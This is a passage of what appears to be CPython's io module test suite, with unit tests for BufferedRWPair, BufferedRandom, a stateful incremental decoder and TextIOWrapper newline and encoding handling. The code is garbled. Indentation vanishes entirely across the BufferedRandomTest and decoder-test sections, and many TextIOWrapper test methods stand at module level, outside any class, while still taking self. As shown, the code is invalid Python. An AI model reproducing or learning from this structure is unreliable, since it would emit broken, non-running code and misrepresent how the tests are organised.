        pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
        self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])

    def test_read1(self):
        # .read1() is delegated to the underlying reader object, so this test
        # can be shallow.
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertEqual(pair.read1(3), b"abc")
        self.assertEqual(pair.read1(), b"def")

    def test_readinto(self):
        for method in ("readinto", "readinto1"):
            with self.subTest(method):
                pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
                data = byteslike(b'\0' * 5)
                self.assertEqual(getattr(pair, method)(data), 5)
                self.assertEqual(bytes(data), b"abcde")

    def test_write(self):
        w = self.MockRawIO()
        pair = self.tp(self.MockRawIO(), w)
        pair.write(b"abc")
        pair.flush()
        buffer = bytearray(b"def")
        pair.write(buffer)
        buffer[:] = b"***" # Overwrite our copy of the data
        pair.flush()
        # The pair must have copied the data, not kept a view.
        self.assertEqual(w._write_stack, [b"abc", b"def"])

    def test_peek(self):
        pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
        self.assertTrue(pair.peek(3).startswith(b"abc"))
        self.assertEqual(pair.read(3), b"abc")

    def test_readable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.readable())

    def test_writeable(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertTrue(pair.writable())

    def test_seekable(self):
        # BufferedRWPairs are never seekable, even if their readers and writers
        # are.
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.seekable())

    # .flush() is delegated to the underlying writer object and has been
    # tested in the test_write method.

    def test_close_and_closed(self):
        pair = self.tp(self.MockRawIO(), self.MockRawIO())
        self.assertFalse(pair.closed)
        pair.close()
        self.assertTrue(pair.closed)

    def test_reader_close_error_on_close(self):
        # If only the reader's close() fails, the pair still reports closed
        # and the writer gets closed anyway.
        def reader_close():
            reader_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertTrue(pair.closed)
        self.assertFalse(reader.closed)
        self.assertTrue(writer.closed)

    def test_writer_close_error_on_close(self):
        # If the writer's close() fails, the pair does NOT report closed.
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('writer_non_existing', str(err.exception))
        self.assertFalse(pair.closed)
        self.assertTrue(reader.closed)
        self.assertFalse(writer.closed)

    def test_reader_writer_close_error_on_close(self):
        # Both close() calls fail: the reader's error propagates with the
        # writer's error chained as __context__.
        def reader_close():
            reader_non_existing
        def writer_close():
            writer_non_existing
        reader = self.MockRawIO()
        reader.close = reader_close
        writer = self.MockRawIO()
        writer.close = writer_close
        pair = self.tp(reader, writer)
        with self.assertRaises(NameError) as err:
            pair.close()
        self.assertIn('reader_non_existing', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('writer_non_existing', str(err.exception.__context__))
        self.assertFalse(pair.closed)
        self.assertFalse(reader.closed)
        self.assertFalse(writer.closed)

    def test_isatty(self):
        # The pair is a tty if either half is a tty.
        class SelectableIsAtty(MockRawIO):
            def __init__(self, isatty):
                MockRawIO.__init__(self)
                self._isatty = isatty
            def isatty(self):
                return self._isatty
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
        self.assertFalse(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())
        pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
        self.assertTrue(pair.isatty())

    def test_weakref_clearing(self):
        brw = self.tp(self.MockRawIO(), self.MockRawIO())
        ref = weakref.ref(brw)
        brw = None
        ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
    """Runs BufferedRWPairTest against the C implementation."""
    tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
    """Runs BufferedRWPairTest against the pure-Python implementation."""
    tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
    """Alternating 1-byte writes and reads advance a single shared position."""
    # Test for issue #12213
    with self.BytesIO(b'abcdefgh') as raw:
        with self.tp(raw, 100) as f:
            f.write(b"1")
            self.assertEqual(f.read(1), b'b')
            f.write(b'2')
            self.assertEqual(f.read1(1), b'd')
            f.write(b'3')
            buf = bytearray(1)
            f.readinto(buf)
            self.assertEqual(buf, b'f')
            f.write(b'4')
            self.assertEqual(f.peek(1), b'h')
            f.flush()
            # Writes landed in place between the bytes that were read.
            self.assertEqual(raw.getvalue(), b'1b2d3f4h')

    with self.BytesIO(b'abc') as raw:
        with self.tp(raw, 100) as f:
            self.assertEqual(f.read(1), b'a')
            f.write(b"2")
            self.assertEqual(f.read(1), b'c')
            f.flush()
            self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
    """Alternating writes and readline() calls share one position too."""
    with self.BytesIO(b'ab\ncdef\ng\n') as raw:
        with self.tp(raw) as f:
            f.write(b'1')
            self.assertEqual(f.readline(), b'b\n')
            f.write(b'2')
            self.assertEqual(f.readline(), b'def\n')
            f.write(b'3')
            self.assertEqual(f.readline(), b'\n')
            f.flush()
            self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')

# You can't construct a BufferedRandom over a non-seekable stream.
# Disable the inherited test by shadowing it with None.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
    """Run the BufferedRandom test suite against the C implementation."""
    tp = io.BufferedRandom

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        """A huge buffer size must raise cleanly instead of crashing."""
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_garbage_collection(self):
        """Delegate to the C reader and writer garbage-collection checks."""
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)

    def test_args_error(self):
        # Issue #17275: the error message must name BufferedRandom.
        with self.assertRaisesRegex(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
    """Run the BufferedRandom test suite against the pure-Python implementation."""
    tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    For testing seek/tell behavior with a stateful, buffering decoder.

    Input is a sequence of words.  Words may be fixed-length (length set
    by input) or variable-length (period-terminated).  In variable-length
    mode, extra periods are ignored.  Possible words are:
      - 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are space-terminated.
      - 'o' followed by a number sets the output length, O (maximum 99).
      - Any other word is converted into a word followed by a period on
        the output.  The output word consists of the input word truncated
        or padded out with hyphens to make its length equal to O.  If O
        is 0, the word is output verbatim without truncating or padding.
    I and O are initially set to 1.  When I changes, any buffered input is
    re-scanned according to the new I.  EOF also terminates the last word.
    """

    def __init__(self, errors='strict'):
        codecs.IncrementalDecoder.__init__(self, errors)
        self.reset()

    def __repr__(self):
        return '<SID %x>' % id(self)

    def reset(self):
        # Current input length, output length, and pending input bytes.
        self.i = 1
        self.o = 1
        self.buffer = bytearray()

    def getstate(self):
        # XOR the flags with 1 so that the state is (b"", 0) right after
        # reset(), as the seek/tell machinery expects.
        return bytes(self.buffer), (self.i ^ 1) * 100 + (self.o ^ 1)

    def setstate(self, state):
        pending, flags = state
        self.buffer = bytearray(pending)
        i_flag, o_flag = divmod(flags, 100)
        self.i, self.o = i_flag ^ 1, o_flag ^ 1

    def decode(self, input, final=False):
        pieces = []
        for byte in input:
            if self.i == 0:
                # Variable-length mode: words are period-terminated and
                # extra periods (empty buffer) are ignored.
                if byte == ord('.'):
                    if self.buffer:
                        pieces.append(self.process_word())
                else:
                    self.buffer.append(byte)
            else:
                # Fixed-length mode: emit a word every self.i bytes.
                self.buffer.append(byte)
                if len(self.buffer) == self.i:
                    pieces.append(self.process_word())
        if final and self.buffer:
            # EOF terminates the last word.
            pieces.append(self.process_word())
        return ''.join(pieces)

    def process_word(self):
        """Consume the buffered word: update I/O settings or emit output."""
        output = ''
        if self.buffer[0] == ord('i'):
            self.i = min(99, int(self.buffer[1:] or 0))    # set input length
        elif self.buffer[0] == ord('o'):
            self.o = min(99, int(self.buffer[1:] or 0))    # set output length
        else:
            output = self.buffer.decode('ascii')
            if len(output) < self.o:
                output += '-' * self.o                     # pad out with hyphens
            if self.o:
                output = output[:self.o]                   # truncate to output length
            output += '.'
        self.buffer = bytearray()
        return output

    # When False, lookupTestDecoder refuses to resolve 'test_decoder'.
    codecEnabled = False

    @classmethod
    def lookupTestDecoder(cls, name):
        """Codec search function resolving 'test_decoder' when enabled."""
        if not (cls.codecEnabled and name == 'test_decoder'):
            return None
        latin1 = codecs.lookup('latin-1')
        return codecs.CodecInfo(
            name='test_decoder', encode=latin1.encode, decode=None,
            incrementalencoder=None,
            streamreader=None, streamwriter=None,
            incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it (by flipping
# StatefulIncrementalDecoder.codecEnabled), so registration is harmless here.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
    # NOTE(review): self.BytesIO, self.TextIOWrapper, self.open, etc. are
    # presumably bound by implementation-specific subclasses (C vs pure
    # Python) — confirm against the rest of the file.

    def setUp(self):
        # Raw data mixing every newline convention, and its
        # universal-newline (normalized) decoded form.
        self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
        self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
        support.unlink(support.TESTFN)

    def tearDown(self):
        # Remove the scratch file a test may have left behind.
        support.unlink(support.TESTFN)
def test_constructor(self):
    """__init__ may be called again to reconfigure an existing wrapper."""
    r = self.BytesIO(b"\xc3\xa9\n\n")
    b = self.BufferedReader(r, 1000)
    t = self.TextIOWrapper(b)
    t.__init__(b, encoding="latin-1", newline="\r\n")
    self.assertEqual(t.encoding, "latin-1")
    self.assertEqual(t.line_buffering, False)
    t.__init__(b, encoding="utf-8", line_buffering=True)
    self.assertEqual(t.encoding, "utf-8")
    self.assertEqual(t.line_buffering, True)
    self.assertEqual("\xe9\n", t.readline())
    # Invalid newline arguments are rejected with the right exceptions.
    self.assertRaises(TypeError, t.__init__, b, newline=42)
    self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
    """Using a wrapper created via __new__ without __init__ fails cleanly."""
    t = self.TextIOWrapper.__new__(self.TextIOWrapper)
    del t
    t = self.TextIOWrapper.__new__(self.TextIOWrapper)
    self.assertRaises(Exception, repr, t)
    self.assertRaisesRegex((ValueError, AttributeError),
                           'uninitialized|has no attribute',
                           t.read, 0)
    # A late __init__ makes the object usable.
    t.__init__(self.MockRawIO())
    self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
    """The constructor refuses codecs not marked as text encodings.

    http://bugs.python.org/issue20404
    """
    raw = self.BytesIO()
    buffered = self.BufferedWriter(raw)
    with self.assertRaisesRegex(LookupError, "is not a text encoding"):
        self.TextIOWrapper(buffered, encoding="hex")
def test_detach(self):
    """detach() flushes, returns the buffer, and disables further detaches."""
    r = self.BytesIO()
    b = self.BufferedWriter(r)
    t = self.TextIOWrapper(b)
    self.assertIs(t.detach(), b)

    t = self.TextIOWrapper(b, encoding="ascii")
    t.write("howdy")
    # Nothing reaches the raw stream until detach() flushes.
    self.assertFalse(r.getvalue())
    t.detach()
    self.assertEqual(r.getvalue(), b"howdy")
    self.assertRaises(ValueError, t.detach)

    # Operations independent of the detached stream should still work
    repr(t)
    self.assertEqual(t.encoding, "ascii")
    self.assertEqual(t.errors, "strict")
    self.assertFalse(t.line_buffering)
    self.assertFalse(t.write_through)
def test_repr(self):
    """repr() reflects name/mode/encoding as they become available."""
    raw = self.BytesIO("hello".encode("utf-8"))
    b = self.BufferedReader(raw)
    t = self.TextIOWrapper(b, encoding="utf-8")
    modname = self.TextIOWrapper.__module__
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper encoding='utf-8'>" % modname)
    raw.name = "dummy"
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
    t.mode = "r"
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
    raw.name = b"dummy"
    # A bytes name is shown with its b'...' repr.
    self.assertEqual(repr(t),
                     "<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)

    t.buffer.detach()
    repr(t)  # Should not raise an exception
def test_recursive_repr(self):
    """A name attribute that refers back to the wrapper must not crash repr()."""
    # Issue #25455
    raw = self.BytesIO()
    t = self.TextIOWrapper(raw)
    with support.swap_attr(raw, 'name', t):
        try:
            repr(t)  # Should not crash
        except RuntimeError:
            # Recursion errors are acceptable; crashes are not.
            pass
def test_line_buffering(self):
    """With line_buffering=True, output is flushed on '\\n' and '\\r'."""
    r = self.BytesIO()
    b = self.BufferedWriter(r, 1000)
    t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
    t.write("X")
    self.assertEqual(r.getvalue(), b"")  # No flush happened
    t.write("Y\nZ")
    self.assertEqual(r.getvalue(), b"XY\nZ")  # All got flushed
    t.write("A\rB")
    self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
    """reconfigure(line_buffering=...) flushes and changes the flag in place."""
    r = self.BytesIO()
    b = self.BufferedWriter(r, 1000)
    t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
    t.write("AB\nC")
    self.assertEqual(r.getvalue(), b"")

    t.reconfigure(line_buffering=True)   # implicit flush
    self.assertEqual(r.getvalue(), b"AB\nC")
    t.write("DEF\nG")
    self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
    t.write("H")
    self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
    t.reconfigure(line_buffering=False)   # implicit flush
    self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
    t.write("IJ")
    self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")

    # Keeping default value: reconfigure() and line_buffering=None
    # both leave the current setting unchanged.
    t.reconfigure()
    t.reconfigure(line_buffering=None)
    self.assertEqual(t.line_buffering, False)
    t.reconfigure(line_buffering=True)
    t.reconfigure()
    t.reconfigure(line_buffering=None)
    self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
    """With no encoding argument, the locale's preferred encoding is used."""
    old_environ = dict(os.environ)
    try:
        # try to get a user preferred encoding different than the current
        # locale encoding to check that TextIOWrapper() uses the current
        # locale encoding and not the user preferred encoding
        for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
            if key in os.environ:
                del os.environ[key]

        current_locale_encoding = locale.getpreferredencoding(False)
        b = self.BytesIO()
        t = self.TextIOWrapper(b)
        self.assertEqual(t.encoding, current_locale_encoding)
    finally:
        # Restore the environment exactly as it was.
        os.environ.clear()
        os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
    """A fileno() too large for C int/uint raises OverflowError (issue 15989)."""
    # Issue 15989
    import _testcapi
    b = self.BytesIO()
    b.fileno = lambda: _testcapi.INT_MAX + 1
    self.assertRaises(OverflowError, self.TextIOWrapper, b)
    b.fileno = lambda: _testcapi.UINT_MAX + 1
    self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
    """The encoding attribute is always set and resolvable via codecs."""
    stream = self.BytesIO()
    wrapper = self.TextIOWrapper(stream, encoding="utf-8")
    self.assertEqual(wrapper.encoding, "utf-8")
    # With no explicit encoding, some default must still be chosen...
    wrapper = self.TextIOWrapper(stream)
    self.assertIsNotNone(wrapper.encoding)
    # ...and it must name a real codec.
    codecs.lookup(wrapper.encoding)
def test_encoding_errors_reading(self):
    """Decoding errors honour the errors= argument (default is strict)."""
    def make_wrapper(**kwargs):
        raw = self.BytesIO(b"abc\n\xff\n")
        return self.TextIOWrapper(raw, encoding="ascii", **kwargs)

    # (1) default and (2) explicit "strict" both raise on the bad byte.
    self.assertRaises(UnicodeError, make_wrapper().read)
    self.assertRaises(UnicodeError, make_wrapper(errors="strict").read)
    # (3) "ignore" drops the bad byte entirely.
    self.assertEqual(make_wrapper(errors="ignore").read(), "abc\n\n")
    # (4) "replace" substitutes U+FFFD.
    self.assertEqual(make_wrapper(errors="replace").read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
    """Encoding errors honour the errors= argument (default is strict)."""
    # (1) default and (2) explicit "strict" refuse an unencodable character.
    for kwargs in ({}, {"errors": "strict"}):
        t = self.TextIOWrapper(self.BytesIO(), encoding="ascii", **kwargs)
        self.assertRaises(UnicodeError, t.write, "\xff")
    # (3) "ignore" drops the character; (4) "replace" writes "?".
    for errors, expected in (("ignore", b"abcdef\n"),
                             ("replace", b"abc?def\n")):
        raw = self.BytesIO()
        t = self.TextIOWrapper(raw, encoding="ascii", errors=errors,
                               newline="\n")
        t.write("abc\xffdef\n")
        t.flush()
        self.assertEqual(raw.getvalue(), expected)
def test_newlines(self):
    """Newline translation is correct for all encodings and buffer sizes."""
    input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]

    # (newline argument, expected lines) pairs.
    tests = [
        [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
        [ '', input_lines ],
        [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
        [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
        [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
    ]
    encodings = (
        'utf-8', 'latin-1',
        'utf-16', 'utf-16-le', 'utf-16-be',
        'utf-32', 'utf-32-le', 'utf-32-be',
    )

    # Try a range of buffer sizes to test the case where \r is the last
    # character in TextIOWrapper._pending_line.
    for encoding in encodings:
        # XXX: str.encode() should return bytes
        data = bytes(''.join(input_lines).encode(encoding))
        for do_reads in (False, True):
            for bufsize in range(1, 10):
                for newline, exp_lines in tests:
                    bufio = self.BufferedReader(self.BytesIO(data), bufsize)
                    textio = self.TextIOWrapper(bufio, newline=newline,
                                              encoding=encoding)
                    if do_reads:
                        # Read two chars at a time, then the rest of the line.
                        got_lines = []
                        while True:
                            c2 = textio.read(2)
                            if c2 == '':
                                break
                            self.assertEqual(len(c2), 2)
                            got_lines.append(c2 + textio.readline())
                    else:
                        got_lines = list(textio)

                    for got_line, exp_line in zip(got_lines, exp_lines):
                        self.assertEqual(got_line, exp_line)
                    self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
    """readlines()/read() split correctly for every newline argument."""
    testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
    normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    for newline, expected in [
        (None, normalized.decode("ascii").splitlines(keepends=True)),
        ("", testdata.decode("ascii").splitlines(keepends=True)),
        ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
        ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
        ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
        ]:
        buf = self.BytesIO(testdata)
        txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
        self.assertEqual(txt.readlines(), expected)
        txt.seek(0)
        self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
    """On output, '\\n' is translated per the newline argument; '\\r' is not."""
    testdict = {
        "": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
        "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
        "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
        "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
        }
    # newline=None behaves like the platform's os.linesep.
    tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
    for newline, expected in tests:
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
        txt.write("AAA\nB")
        txt.write("BB\nCCC\n")
        txt.write("X\rY\r\nZ")
        txt.flush()
        self.assertEqual(buf.closed, False)
        self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
    """Dropping the wrapper flushes pending text before closing the buffer."""
    l = []
    base = self.BytesIO
    class MyBytesIO(base):
        def close(self):
            # Record the buffer contents at close time.
            l.append(self.getvalue())
            base.close(self)
    b = MyBytesIO()
    t = self.TextIOWrapper(b, encoding="ascii")
    t.write("abc")
    del t
    support.gc_collect()
    self.assertEqual([b"abc"], l)
def test_override_destructor(self):
    """A subclass __del__ runs first, then close(), then flush()."""
    record = []
    class MyTextIO(self.TextIOWrapper):
        def __del__(self):
            record.append(1)
            try:
                f = super().__del__
            except AttributeError:
                # The base class may not define __del__ at all.
                pass
            else:
                f()
        def close(self):
            record.append(2)
            super().close()
        def flush(self):
            record.append(3)
            super().flush()
    b = self.BytesIO()
    t = MyTextIO(b, encoding="ascii")
    del t
    support.gc_collect()
    self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
    """The destructor must not clobber an in-flight exception."""
    # Test that the exception state is not modified by a destructor,
    # even if close() fails.
    rawio = self.CloseFailureIO()
    def f():
        self.TextIOWrapper(rawio).xyzzy
    with support.captured_output("stderr") as s:
        self.assertRaises(AttributeError, f)
    s = s.getvalue().strip()
    if s:
        # The destructor *may* have printed an unraisable error, check it
        self.assertEqual(len(s.splitlines()), 1)
        self.assertTrue(s.startswith("Exception OSError: "), s)
        self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API

def test_basic_io(self):
    """Round-trip write/read/seek/tell across chunk sizes and encodings."""
    for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
